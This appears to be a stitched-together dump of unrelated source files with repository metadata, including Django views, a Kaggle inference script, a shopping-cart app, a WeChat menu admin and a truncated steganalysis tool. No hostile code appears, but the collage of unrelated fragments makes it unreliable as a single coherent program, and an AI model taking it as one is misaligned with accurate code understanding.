result = result + '<br>port: %s ' % request.get_port()
result = result + '<br>https: %s ' % request.is_secure()
# request.META: Python字典, 包含所有HTTP请求头
try:
result = result + '<br>Accept: %s ' % request.META['HTTP_ACCEPT']
except KeyError:
result = result + '<br>HTTP请求头获取异常'
# 下面是展示META内部的键值
# values = request.META.items()
# sorted(values)
# html = []
# for key,value in values:
# html.append('<tr><td>%s</td><td>%s</td></tr>' % (key,value))
#
# return HttpResponse('<table>%s</table>' % '\n'.join(html))
return HttpResponse(result)
# 处理表单(Form)提交的数据
def searchForm(request):
return render_to_response('search_form.html')
# def search(request):
# if 'name' in request.GET:
# message = 'You searched for:%s' % request.GET['name']
# else:
# message = 'You submmited an empty form.'
# return HttpResponse(message)
# 从数据库查询数据
from mt.models import Movie
# def search(request):
# if 'name' in request.GET:
# name = request.GET['name']
# movies = Movie.objects.filter(type__icontains=name)
# return render_to_response('search_results.html', {'movies':movies, 'query':name})
# else:
# return HttpResponse('Pls submit a search term.')
# 改进表单
def search(request):
if 'name' in request.GET:
name = request.GET['name']
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext.html', {'movies':movies, 'query':name})
else:
return render_to_response('search_form_ext.html', {'error':True})
# 简单的表单校验
def searchVerify1(request):
error = False
if 'name' in request.GET:
name = request.GET['name']
# name必须有值
if not name:
error = True
elif len(name) > 10:
error = True
else:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verify.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verify.html', {'error':True})
def searchVerify(request):
errors = []
if 'name' in request.GET:
name = request.GET['name']
# name必须有值
if not name:
errors.append('请输入电影类型名')
elif len(name) > 10:
errors.append('电影类型名长度不能大于10')
else:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verify2.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verify2.html', {'errors':errors})
# 复杂的表单校验
def searchVerifyad(request):
errors = []
if 'name' in request.GET:
name = request.GET['name']
value1 = request.GET['value1']
value2 = request.GET['value2']
# name必须有值
if not name:
errors.append('请输入电影类型名')
if not value1:
errors.append('必须提供value1')
if not value2:
errors.append('必须提供value2')
if not errors:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verifad.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verifyad.html', {'errors':errors})
# 编写Form类
# django.forms.Form
# 在视图中使用Form对象
from mt.forms import MyForm
# from django.views.decorators.csrf import csrf_exempt
# @csrf_exempt
# from django.views.decorators.csrf import csrf_protect
# from django.middleware.csrf import get_token
# @csrf_protect
# def contact(request):
# # print(get_token(request))
# if request.method == 'POST':
# form = MyForm(request.POST)
# if form.is_valid():
# print('完成与业务相关的工作')
# return HttpResponse('OK')
# else:
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# else:
# form = MyForm(initial={'name':'秦柯', 'email':'collinsctk@qytang.com', 'message':'没有信息'}) # 初始值
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# 处理CSRF问题
def contact(request):
# print(get_token(request))
if request.method == 'POST':
form = MyForm(request.POST)
if form.is_valid():
print('完成与业务相关的工作')
return HttpResponse('OK')
else:
return render(request,'my_form.html',{'form':form})
else:
form = MyForm(initial={'name':'秦柯', 'email':'collinsctk@qytang.com', 'message':'没有信息'}) # 初始值
return render(request,'my_form.html',{'form':form})
if __name__ == "__main__":
pass | [
"collinsctk@qytang.com"
] | collinsctk@qytang.com |
b346be7c08d4667def335dc1db37baaf9486db3f | 5ea13cd8f65c9a2d068d8f9778aea1a35850ea10 | /working/inference_clean.py | 70d9b529f9a826d73721ddeb20702487b08a4bff | [] | no_license | unonao/kaggle-inclass-gala | b6a0d076450022dc8df8e8c3d88b5b338933c071 | 3f140439bfdbda06ca54e41fe1aa9a7e32bfb450 | refs/heads/main | 2023-03-30T06:22:29.390521 | 2021-04-03T03:41:23 | 2021-04-03T03:41:23 | 341,119,317 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,561 | py | # misc を除いて、clean なデータのみで学習する
# stratifiedKFold の分割の仕方が他と同じになるように変形
import argparse
import json
import os
import datetime
import numpy as np
import pandas as pd
import torch
from torch import nn
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import log_loss
# 引数で config の設定を行う
parser = argparse.ArgumentParser()
parser.add_argument('--config', default='./configs/clean.json')
options = parser.parse_args()
CFG = json.load(open(options.config))
# logger の設定
from logging import getLogger, StreamHandler,FileHandler, Formatter, DEBUG, INFO
logger = getLogger("logger") #logger名loggerを取得
logger.setLevel(DEBUG) #loggerとしてはDEBUGで
#handler1を作成
handler_stream = StreamHandler()
handler_stream.setLevel(DEBUG)
handler_stream.setFormatter(Formatter("%(asctime)s: %(message)s"))
#handler2を作成
config_filename = os.path.splitext(os.path.basename(options.config))[0]
handler_file = FileHandler(filename=f'./logs/inference_clean_{config_filename}_{CFG["model_arch"]}.log')
handler_file.setLevel(DEBUG)
handler_file.setFormatter(Formatter("%(asctime)s: %(message)s"))
#loggerに2つのハンドラを設定
logger.addHandler(handler_stream)
logger.addHandler(handler_file)
from model.transform import get_train_transforms, get_valid_transforms, get_inference_transforms
from model.dataset import GalaDataset
from model.model import GalaImgClassifier
from model.epoch_api import train_one_epoch, valid_one_epoch, inference_one_epoch
from model.utils import seed_everything
test = pd.DataFrame()
test['Image'] = list(os.listdir('../input/gala-images-classification/dataset/Test_Images'))
def load_clean_train_df(path):
"infer_clean 用。ひとまず全て読みだす(miscも含む)"
train_with_misc = pd.read_csv(path)
train_with_misc["is_misc"] = (train_with_misc["Class"]=="misc")*1
label_dic = {"Attire":0, "Food":1, "Decorationandsignage":2,"misc":3}
train_with_misc["label"]=train_with_misc["Class"].map(label_dic)
return train_with_misc
def infer_clean():
logger.debug("pred clean start")
train = load_clean_train_df("../input/gala-images-classification/dataset/train.csv")
seed_everything(CFG['seed'])
folds = StratifiedKFold(n_splits=CFG['fold_num'], shuffle=True, random_state=CFG['seed']).split(np.arange(train.shape[0]), train.label.values)
tst_preds = []
val_loss = []
val_acc = []
# 行数を揃えた空のデータフレームを作成
cols = ["Attire", "Food", "Decorationandsignage"]
oof_df = pd.DataFrame(index=[i for i in range(train.shape[0])],columns=cols)
y_preds_df = pd.DataFrame(index=[i for i in range(test.shape[0])], columns=cols)
for fold, (trn_idx, val_idx) in enumerate(folds):
logger.debug('Inference fold {} started'.format(fold))
input_shape=(CFG["img_size_h"], CFG["img_size_w"])
valid_ = train.loc[val_idx,:].reset_index(drop=True)
valid_ds = GalaDataset(valid_, '../input/gala-images-classification/dataset/Train_Images', transforms=get_inference_transforms(input_shape, CFG["transform_way"]), shape=input_shape, output_label=False)
# misc でないと判断したものを推論する
test_ds = GalaDataset(test, '../input/gala-images-classification/dataset/Test_Images', transforms=get_inference_transforms(input_shape, CFG["transform_way"]), shape=input_shape, output_label=False)
val_loader = torch.utils.data.DataLoader(
valid_ds,
batch_size=CFG['valid_bs'],
num_workers=CFG['num_workers'],
shuffle=False,
pin_memory=False,
)
tst_loader = torch.utils.data.DataLoader(
test_ds,
batch_size=CFG['valid_bs'],
num_workers=CFG['num_workers'],
shuffle=False,
pin_memory=False,
)
device = torch.device(CFG['device'])
#model = GalaImgClassifier(CFG['model_arch'], train.label.nunique()).to(device)
model = GalaImgClassifier(CFG['model_arch'], train.label.nunique()-1).to(device) # misc を除いた
val_preds = []
#for epoch in range(CFG['epochs']-3):
for i, epoch in enumerate(CFG['used_epochs']):
model.load_state_dict(torch.load(f'save/clean_{config_filename}_{CFG["model_arch"]}_fold_{fold}_{epoch}'))
with torch.no_grad():
for _ in range(CFG['tta']):
val_preds += [CFG['weights'][i]/sum(CFG['weights'])*inference_one_epoch(model, val_loader, device)]
tst_preds += [CFG['weights'][i]/sum(CFG['weights'])*inference_one_epoch(model, tst_loader, device)]
val_preds = np.mean(val_preds, axis=0)
oof_df.loc[val_idx, cols] = val_preds
# misc を除いたときの validation loss をみる
indx = valid_["Class"]!="misc"
val_loss.append(log_loss(valid_.label.values[indx], val_preds[indx]))
val_acc.append((valid_.label.values[indx]==np.argmax(val_preds[indx], axis=1)).mean())
# 閾値ごとの正答率をみる
for p in CFG["prob_thres"]:
label_preds = np.argmax(val_preds, axis=1)
label_preds[val_preds.max(axis=1)<p] = 3
logger.debug('fold {} (p={}) validation accuracy = {:.5f}'.format(fold, p, (valid_.label.values == label_preds).mean()))
logger.debug('no misc validation loss = {:.5f}'.format( np.mean(val_loss)))
logger.debug('no misc validation accuracy = {:.5f}'.format( np.mean(val_acc)))
tst_preds = np.mean(tst_preds, axis=0)
y_preds_df.loc[:, cols] = tst_preds #.reshape(len(tst_preds), -1)
# 予測値を保存
oof_df.to_csv(f'output/{config_filename}_{CFG["model_arch"]}_oof.csv', index=False)
y_preds_df.to_csv(f'output/{config_filename}_{CFG["model_arch"]}_test.csv', index=False)
del model
torch.cuda.empty_cache()
return tst_preds
if __name__ == '__main__':
logger.debug(CFG)
tst_preds = infer_clean()
# 予測結果を保存
for p in CFG["prob_thres"]:
logger.debug(f"p: {p}")
test['Class'] = np.argmax(tst_preds, axis=1)
test.loc[tst_preds.max(axis=1)<p, 'Class'] = 3
label_dic = {0:"Attire", 1:"Food", 2:"Decorationandsignage",3:"misc"}
test["Class"]=test["Class"].map(label_dic)
logger.debug(test.value_counts("Class"))
test.to_csv(f'output/submission_clean_{p}_{config_filename}_{CFG["model_arch"]}.csv', index=False)
| [
"naokiuno634@gmail.com"
] | naokiuno634@gmail.com |
f4c058174d0fe0641cc14e15cc4ebdc4fe708c8d | bb10d0cd5a6e8351f731aeb4db010d18d08455ea | /AWSChaliceDemo/chalice-env/bin/pyjwt | 442a044bd7f8b2507bd5db3693bc6f76026a0b75 | [] | no_license | LonelyProgrammer/Microservices | 99328ed0f7412149a2741a71458c8957b0b988ba | a13d9cdee8b57530ff111cb405a9f52e96a73103 | refs/heads/master | 2022-11-07T06:58:32.321743 | 2019-04-10T12:57:30 | 2019-04-10T12:57:30 | 154,377,809 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 276 | #!/Users/rishi/Documents/PersonalProjects/AWSChaliceDemo/chalice-env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from jwt.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"sapbhat2@in.ibm.com"
] | sapbhat2@in.ibm.com | |
4fd19f0d6427d3780745d40289680a45f973c045 | 60f6f21eda76ad5d15c75ca14f00ba5f8d23fa15 | /selenium_2.1.py | 013ce30803a7cb47781a01e8052a2d2dbbcd175f | [] | no_license | TheGeodez/auto-test-course | aa08c34962ab96ccaaca3487930c9e58cca114df | 45f7caec815a2c9db441063a3cada5ecb38e9978 | refs/heads/master | 2020-06-24T12:29:04.723844 | 2019-07-26T07:30:52 | 2019-07-26T07:30:52 | 198,962,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 614 | py | from selenium import webdriver
import time
import math
link = "http://suninjuly.github.io/get_attribute.html"
browser = webdriver.Chrome()
browser.get(link)
treasure = browser.find_element_by_id('treasure')
x = treasure.get_attribute("valuex")
def calc(x):
return str(math.log(abs(12 * math.sin(int(x)))))
y = calc(x)
input1 = browser.find_element_by_id('answer')
input1.send_keys(y)
checkbox = browser.find_element_by_id('robotCheckbox')
checkbox.click()
radiobutton = browser.find_element_by_id('robotsRule')
radiobutton.click()
btn = browser.find_element_by_css_selector('.btn')
btn.click()
| [
"TheGeodez@yandex.ru"
] | TheGeodez@yandex.ru |
1a6b80d355ba49710ba8e7646cb0647d4dd27a2f | 0f592991f5c3976b2a3eef70043949f56d74133f | /carts/views.py | ef615f06dcecf60f39bdc55b69ce7edfbead49d7 | [] | no_license | Stephyo/kart | a7c8da4aa006ef9180aa431401e1555b64dd9519 | 73835cbc513675985f0fc6c1516142c9e2375566 | refs/heads/main | 2023-06-11T16:56:09.145073 | 2021-07-06T16:50:12 | 2021-07-06T16:50:12 | 374,589,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,295 | py | from django.core.exceptions import ObjectDoesNotExist
from carts.models import CartItem
from django.shortcuts import redirect, render, get_object_or_404
from store.models import Product, Variation
from .models import Cart, CartItem
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
# Create your views here.
def _cart_id(request):
cart = request.session.session_key
if not cart:
cart = request.session.create()
return cart
def add_cart(request, product_id):
current_user = request.user
product = Product.objects.get(id=product_id) # get product
# if the user is authenticated
if current_user.is_authenticated:
product_variation = []
if request.method == 'POST':
for item in request.POST:
key = item
value = request.POST[key]
try:
variation = Variation.objects.get(
product=product, variation_category__iexact=key, variation_value__iexact=value)
product_variation.append(variation)
except:
pass
is_cart_item_exists = CartItem.objects.filter(
product=product, user=current_user).exists()
if is_cart_item_exists:
cart_item = CartItem.objects.filter(
product=product, user=current_user)
# exisiting_variations --> DB
# current varation --> product_variation
# item_id --> DB
ex_var_list = []
id = []
for item in cart_item:
existing_variation = item.variations.all()
ex_var_list.append(list(existing_variation))
id.append(item.id)
if product_variation in ex_var_list:
# increase the cart item quantity
index = ex_var_list.index(product_variation)
item_id = id[index]
item = CartItem.objects.get(product=product, id=item_id)
item.quantity += 1
item.save()
else:
# create new cart item
item = CartItem.objects.create(
product=product, quantity=1, user=current_user)
if len(product_variation) > 0:
item.variations.clear()
item.variations.add(*product_variation)
item.save()
else:
cart_item = CartItem.objects.create(
product=product,
quantity=1,
user=current_user,)
if len(product_variation) > 0:
cart_item.variations.clear()
cart_item.variations.add(*product_variation)
cart_item.save()
return redirect('cart')
# if the user is not authenticated
else:
product_variation = []
if request.method == 'POST':
for item in request.POST:
key = item
value = request.POST[key]
try:
variation = Variation.objects.get(
product=product, variation_category__iexact=key, variation_value__iexact=value)
product_variation.append(variation)
except:
pass
try:
cart = Cart.objects.get(
cart_id=_cart_id(request)) # get session id
except Cart.DoesNotExist:
cart = Cart.objects.create(
cart_id=_cart_id(request)
)
cart.save()
is_cart_item_exists = CartItem.objects.filter(
product=product, cart=cart).exists()
if is_cart_item_exists:
cart_item = CartItem.objects.filter(
product=product, cart=cart)
# exisiting_variations --> DB
# current varation --> product_variation
# item_id --> DB
ex_var_list = []
id = []
for item in cart_item:
existing_variation = item.variations.all()
ex_var_list.append(list(existing_variation))
id.append(item.id)
print(ex_var_list)
if product_variation in ex_var_list:
# increase the cart item quantity
index = ex_var_list.index(product_variation)
item_id = id[index]
item = CartItem.objects.get(product=product, id=item_id)
item.quantity += 1
item.save()
else:
# create new cart item
item = CartItem.objects.create(
product=product, quantity=1, cart=cart)
if len(product_variation) > 0:
item.variations.clear()
item.variations.add(*product_variation)
item.save()
else:
cart_item = CartItem.objects.create(
product=product,
quantity=1,
cart=cart,)
if len(product_variation) > 0:
cart_item.variations.clear()
cart_item.variations.add(*product_variation)
cart_item.save()
return redirect('cart')
def remove_cart(request, product_id, cart_item_id):
product = get_object_or_404(Product, id=product_id)
try:
if request.user.is_authenticated:
cart_item = CartItem.objects.get(
product=product, user=request.user, id=cart_item_id)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_item = CartItem.objects.get(
product=product, cart=cart, id=cart_item_id)
if cart_item.quantity > 1:
cart_item.quantity -= 1
cart_item.save()
else:
cart_item.delete()
except:
pass
return redirect('cart')
def remove_cart_item(request, product_id, cart_item_id):
product = get_object_or_404(Product, id=product_id)
if request.user.is_authenticated:
cart_item = CartItem.objects.get(
product=product, user=request.user, id=cart_item_id)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_item = CartItem.objects.get(
product=product, cart=cart, id=cart_item_id)
cart_item.delete()
return redirect('cart')
def cart(request, total=0, quantity=0, cart_items=None):
try:
tax = 0
grand_total = 0
if request.user.is_authenticated:
cart_items = CartItem.objects.filter(
user=request.user, is_active=True)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_items = CartItem.objects.filter(cart=cart, is_active=True)
for cart_item in cart_items:
total += (cart_item.product.price * cart_item.quantity)
quantity += cart_item.quantity
tax = (2*total)/100
grand_total = total + tax
except ObjectDoesNotExist:
pass # just ignore
context = {
'total': total,
'quantity': quantity,
'cart_items': cart_items,
'tax': tax,
'grand_total': grand_total,
}
return render(request, 'store/cart.html', context)
@login_required(login_url='login')
def checkout(request, total=0, quantity=0, cart_items=None):
try:
tax = 0
grand_total = 0
if request.user.is_authenticated:
cart_items = CartItem.objects.filter(
user=request.user, is_active=True)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_items = CartItem.objects.filter(cart=cart, is_active=True)
for cart_item in cart_items:
total += (cart_item.product.price * cart_item.quantity)
quantity += cart_item.quantity
tax = (2*total)/100
grand_total = total + tax
except ObjectDoesNotExist:
pass # just ignore
context = {
'total': total,
'quantity': quantity,
'cart_items': cart_items,
'tax': tax,
'grand_total': grand_total,
}
return render(request, 'store/checkout.html', context)
| [
"sysyeo@gmail.com"
] | sysyeo@gmail.com |
775c3d99a00861bd1974087e2fe75b1216b73fe6 | 421b0ae45f495110daec64ed98c31af525585c2c | /File_Handling/first_file.py | 53c72b560b6263d87c4f8e3ce01570d86ad5fb4f | [] | no_license | Pradeepsuthar/pythonCode | a2c87fb64c79edd11be54c2015f9413ddce246c4 | 14e2b397f69b3fbebde5b3af98898c4ff750c28c | refs/heads/master | 2021-02-18T05:07:40.402466 | 2020-03-05T13:14:15 | 2020-03-05T13:14:15 | 245,163,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # python provied function and methos to preform such as creating, reading, opening, closing etc.
# open file in python
# Syntax
# fileobject = open(file_name[,access_mode][,buffring])
# NOTE : Default access_mode is read
# Create/Open file in write mode
# fw = open("emp.txt","w")
# write data into file
# fw.write("324156\n")
# fw.write("Pradeep Suthar\n")
# fw.write(input("Enter mobile Number : "))
# fw.close()
print("Reading file\n")
fr = open("emp.txt")
data = fr.read()
fr.close()
print("\n",data)
| [
"sutharpradeep081@gmail.com"
] | sutharpradeep081@gmail.com |
2be507ead7c800beb19a0ae9d719aadbcd5f3a69 | c9c991eb14c7b246f33b7c64657cfe0407255c98 | /pages/migrations/0002_delete_image_upload.py | ec7f561a19317ddd1ac4db2e9aff373dd5f9ea12 | [] | no_license | parkashsatiyaar/skintone | 3e8f5e8174dd3cdd0b61800fb6b63818d57a035a | 2d560e18fd95f2d55c49492803c6ffd5e9f7c4fe | refs/heads/master | 2023-07-06T21:13:48.064316 | 2021-05-19T10:24:22 | 2021-05-19T10:24:22 | 367,822,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | # Generated by Django 3.2.2 on 2021-05-18 07:14
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('pages', '0001_initial'),
]
operations = [
migrations.DeleteModel(
name='Image_upload',
),
]
| [
"parkashsatiyaar0008@gmail.com"
] | parkashsatiyaar0008@gmail.com |
6ca1322a0ebf00cda580166cd9db6449064f61cd | 618adefb8a0c608aa07d8d320ca7931a00e71b90 | /airflow/plugins/operators/data_quality.py | 97218e2365692fc89f81174026885f64a04f3b6e | [] | no_license | as234545/full-data-pipline-aws | 59e63253434e0a4c978b3aee6b57531d14bbc4ab | e0c5fa420d39c46ca537ff858d156fbd90cf8f1e | refs/heads/master | 2022-12-11T21:08:16.187365 | 2020-09-10T05:03:28 | 2020-09-10T05:03:28 | 294,254,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class DataQualityOperator(BaseOperator):
ui_color = '#89DA59'
@apply_defaults
def __init__(self,
redshift_conn_id = "",
data_quality_check = "",
*args, **kwargs):
super(DataQualityOperator, self).__init__(*args, **kwargs)
self.redshift_conn_id = redshift_conn_id
self.data_quality_check = data_quality_check
def execute(self, context):
redshift_hook = PostgresHook("redshift")
for check in data_quality_check:
sql = check["check_sql"]
exp = check["expected_result"]
records = redshift_hook.get_records(sql)
num_records = records[0][0]
if num_records != exp:
raise ValueError(f"Data quality check failed. Expected: {exp} | Got: {num_records}")
else:
self.log.info(f"Data quality on SQL {sql} check passed with {records[0][0]} records") | [
"noreply@github.com"
] | as234545.noreply@github.com |
3e4c40a81ec1679f5956768b06eec490e7105db4 | ce6e385087910e9647e8dcc63f515186765a9220 | /second_module.py | 8f4cfcaebecbb732398c0431837b5528097799d3 | [] | no_license | karvendhanm/corey_schafer_oops | 11226c58e25d719baac7bd3994000bb933e46552 | 63a04c1189d1137ce6c66724393192ba1ebe48bc | refs/heads/master | 2020-05-23T20:27:46.551099 | 2020-01-04T03:33:07 | 2020-01-04T03:33:07 | 186,930,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 17 11:15:46 2019
@author: John
"""
import os
os.chdir('C:/Users/John/PycharmProjects/corey_schafer_oops')
os.getcwd()
import first_module
first_module.main()
print("Second Module's Name: {}".format(__name__))
| [
"karvsmech@gmail.com"
] | karvsmech@gmail.com |
f87fdf18000dbea14286976f2daac0671442581c | 3ca67d69abd4e74b7145b340cdda65532f90053b | /BOJ/11052.카드 구매하기/rockmiin.py | d8f9ba374b88c82022c32c6ea323663a79389d39 | [] | no_license | DKU-STUDY/Algorithm | 19549516984b52a1c5cd73e1ed1e58f774d6d30e | 6f78efdbefd8eedab24e43d74c7dae7f95c2893b | refs/heads/master | 2023-02-18T06:48:39.309641 | 2023-02-09T07:16:14 | 2023-02-09T07:16:14 | 258,455,710 | 175 | 49 | null | 2023-02-09T07:16:16 | 2020-04-24T08:42:27 | Python | UTF-8 | Python | false | false | 231 | py |
n= int(input())
p= [0] + list(map(int, input().split()))
dp= [0 for _ in range(n+1)]
dp[1]= p[1]
for i in range(1, n+1):
for j in range(1, i+1):
# print(i, j, dp)
dp[i]= max(dp[i], dp[i-j]+ p[j])
print(dp[-1]) | [
"csm971024@gmail.com"
] | csm971024@gmail.com |
ef323df622ea485ab6e388ecdb0dc1d6032a86ad | 0399aadc90aa00e1b1946bbb9ba574e1dd1ea8f0 | /utils/generate_second.py | 0479b55a10517f41646a58f1cad6f4712d59719e | [] | no_license | sensiarion/kr_tasks_2020 | 14f2c97488d3935417eef21314017b1834186acf | 8f3d10dd4089c6c68d22ef90a481128e10243934 | refs/heads/master | 2023-02-01T02:14:45.560187 | 2020-12-19T10:46:15 | 2020-12-19T10:46:15 | 322,796,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | import random
count = random.randint(10, 20)
lucky_count = random.randint(2, count // 2)
start_from = count % lucky_count
print(count, lucky_count, sep='\n')
print('---------------------------------------')
numbers = range(count)
lucky_numbers = set(range(start_from, count, count // lucky_count))
print(*[i if i not in lucky_numbers else f'\*{i}\*' for i in numbers])
| [
"ichigo7336@gmail.com"
] | ichigo7336@gmail.com |
aea70b7bae784283e27efb8fb4f2bc809628cb32 | 9bf62c04522b6b28e4d4bedd25654d0ea675f72a | /wechat_django/admin/views/menu.py | 38ce85ed5fd22d128e4d83ff133787061ea61e5f | [
"MIT"
] | permissive | x2x4com/wechat-django | 9a46cd34c4a00f515e2e315d51d6475e509ad9f0 | 926e5d2ed2895d30a253504ff252a7a52fcfe81f | refs/heads/master | 2020-05-20T02:31:08.735986 | 2019-05-01T16:03:31 | 2019-05-01T16:03:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,832 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib import messages
from django.urls import reverse
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
import object_tool
from wechatpy.exceptions import WeChatClientException
from ...models import Menu
from ..utils import get_request_params
from ..base import DynamicChoiceForm, WeChatModelAdmin
class MenuAdmin(WeChatModelAdmin):
__category__ = "menu"
__model__ = Menu
changelist_object_tools = ("sync", "publish")
change_form_template = "admin/wechat_django/menu/change_form.html"
change_list_template = "admin/wechat_django/menu/change_list.html"
list_display = (
"operates", "id", "parent_id", "title", "type", "detail", "weight",
"updated_at")
list_display_links = ("title",)
list_editable = ("weight", )
fields = (
"name", "type", "key", "url", "appid", "pagepath", "created_at",
"updated_at")
def title(self, obj):
if obj.parent:
return "|--- " + obj.name
return obj.name
title.short_description = _("title")
@mark_safe
def detail(self, obj):
rv = ""
if obj.type == Menu.Event.CLICK:
rv = obj.content.get("key")
elif obj.type == Menu.Event.VIEW:
rv = '<a href="{0}">{1}</a>'.format(
obj.content.get("url"), _("link"))
elif obj.type == Menu.Event.MINIPROGRAM:
rv = obj.content.get("appid")
return rv or ""
detail.short_description = _("detail")
@mark_safe
def operates(self, obj):
del_url = reverse("admin:wechat_django_menu_delete", kwargs=dict(
object_id=obj.id,
wechat_app_id=obj.app_id
))
rv = '<a class="deletelink" href="{0}"></a>'.format(del_url)
if not obj.parent and not obj.type and obj.sub_button.count() < 5:
query = dict(parent_id=obj.id)
add_link = reverse("admin:wechat_django_menu_add", kwargs=dict(
wechat_app_id=obj.app_id
))
add_url = "{0}?{1}".format(add_link, urlencode(query))
rv += '<a class="addlink" href="{0}"></a>'.format(add_url)
return rv
operates.short_description = _("actions")
@object_tool.confirm(short_description=_("Sync menus"))
def sync(self, request, obj=None):
self.check_wechat_permission(request, "sync")
def action():
Menu.sync(request.app)
return _("Menus successful synchronized")
return self._clientaction(
request, action, _("Sync menus failed with %(exc)s"))
@object_tool.confirm(short_description=_("Publish menus"))
def publish(self, request, obj=None):
self.check_wechat_permission(request, "sync")
def action():
Menu.publish(request.app)
return _("Menus successful published")
return self._clientaction(
request, action, _("Publish menus failed with %(exc)s"))
def get_actions(self, request):
actions = super(MenuAdmin, self).get_actions(request)
if "delete_selected" in actions:
del actions["delete_selected"]
return actions
def get_fields(self, request, obj=None):
fields = list(super(MenuAdmin, self).get_fields(request, obj))
if not obj:
fields.remove("created_at")
fields.remove("updated_at")
return fields
def get_readonly_fields(self, request, obj=None):
rv = super(MenuAdmin, self).get_readonly_fields(request, obj)
if obj:
rv = rv + ("created_at", "updated_at")
return rv
def get_queryset(self, request):
rv = super(MenuAdmin, self).get_queryset(request)
if not get_request_params(request, "menuid"):
rv = rv.filter(menuid__isnull=True)
if request.GET.get("parent_id"):
rv = rv.filter(parent_id=request.GET["parent_id"])
return rv
class MenuForm(DynamicChoiceForm):
content_field = "content"
origin_fields = ("name", "menuid", "type", "weight")
type_field = "type"
key = forms.CharField(label=_("menu key"), required=False)
url = forms.URLField(label=_("url"), required=False)
appid = forms.CharField(label=_("miniprogram app_id"), required=False)
pagepath = forms.CharField(label=_("pagepath"), required=False)
class Meta(object):
model = Menu
fields = ("name", "menuid", "type", "weight")
def allowed_fields(self, type, cleaned_data):
if type == Menu.Event.VIEW:
fields = ("url", )
elif type == Menu.Event.CLICK:
fields = ("key", )
elif type == Menu.Event.MINIPROGRAM:
fields = ("url", "appid", "apppath")
else:
fields = tuple()
return fields
form = MenuForm
def save_model(self, request, obj, form, change):
if not change and request.GET.get("parent_id"):
obj.parent_id = request.GET["parent_id"]
return super().save_model(request, obj, form, change)
def has_add_permission(self, request):
if not super(MenuAdmin, self).has_add_permission(request):
return False
# 判断菜单是否已满
q = self.get_queryset(request)
if request.GET.get("parent_id"):
return q.count() < 5
else:
return q.filter(parent_id__isnull=True).count() < 3
def get_model_perms(self, request):
return (super(MenuAdmin, self).get_model_perms(request)
if request.app.abilities.menus else {})
| [
"13599838712@hotmail.com"
] | 13599838712@hotmail.com |
37b419ad24813c54449547f8bad10d4bd1426dd1 | d118262983f58b164ce4e7261234514170df913f | /Old/addpricepersqft.py | b678a1c541132a8994f615f0009501eb715eb76b | [] | no_license | mboles01/Realestate | 05213a862d32a21dfe47f67de74156f5d978849f | d6f57182d53a2232c9e815691439373936967b95 | refs/heads/master | 2022-05-06T22:34:40.271044 | 2022-03-19T22:49:31 | 2022-03-19T22:49:31 | 185,117,034 | 14 | 10 | null | 2019-09-04T01:09:05 | 2019-05-06T03:25:18 | Python | UTF-8 | Python | false | false | 728 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 9 17:05:25 2019
@author: michaelboles
"""
# pull in data frame with appended latitude, longitude coordinates
import pandas as pd
data_full = pd.read_csv('data_with_coords.csv')
# append price per sqft, price per lot sqft to full data set
data_full["Price per sqft"] = data_full["Price"]/data_full["Home size"]
data_full["Price per lot sqft"] = data_full["Price"]/(43560*data_full["Lot size"])
# remove unneeded columns
del data_full['Unnamed: 0']
del data_full['Unnamed: 0.1']
del data_full['Home type']
# remove unneeded rows
data_full = data_full[data_full["City"] != "Manhattan Beach"]
# write .csv file with data
data_full.to_csv('data_full.csv')
| [
"michaeladamboles@gmail.com"
] | michaeladamboles@gmail.com |
45781c853334c0e2bf8412d12db46f89596a7d57 | 36839e325492220f40b0379fe1468a516b1d8043 | /aletheia.py | 120fa13533b27af0f3399e325ab722442a4391da | [
"MIT"
] | permissive | awesome-security/aletheia | 2218d1f52deca2fae8dcb4b5743a66212a160ddb | 734d9b2a2428035355a1eaf51033e340a9145b9a | refs/heads/master | 2021-08-23T00:35:46.310217 | 2017-12-01T23:10:19 | 2017-12-01T23:10:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,922 | py | #!/usr/bin/python -W ignore
import sys
import json
import os
import scipy
import numpy
import pandas
import pickle
import multiprocessing
from aletheia import stegosim, richmodels, models
from multiprocessing.dummy import Pool as ThreadPool
from multiprocessing import cpu_count
from aletheia import attacks, utils
#from cnn import net as cnn
lock = multiprocessing.Lock()
# {{{ embed_message()
